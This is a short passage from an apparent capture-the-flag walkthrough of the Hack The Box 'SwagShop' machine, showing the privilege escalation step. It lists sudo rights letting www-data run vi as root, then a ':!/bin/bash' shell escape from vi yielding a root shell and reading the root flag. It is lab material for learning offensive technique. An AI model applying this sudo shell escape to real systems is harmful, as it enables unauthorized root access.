3 privesc
sudo -l
Matching Defaults entries for www-data on swagshop:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on swagshop:
(root) NOPASSWD: /usr/bin/vi /var/www/html/*
sudo /usr/bin/vi /var/www/html/test
:!/bin/bash
whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
___ ___
/| |/|\| |\
/_| ยด |.` |_\ We are open! (Almost)
| |. |
| |. | Join the beta HTB Swag Store!
|___|.__| https://hackthebox.store/password
PS: Use root flag as password!
Last updated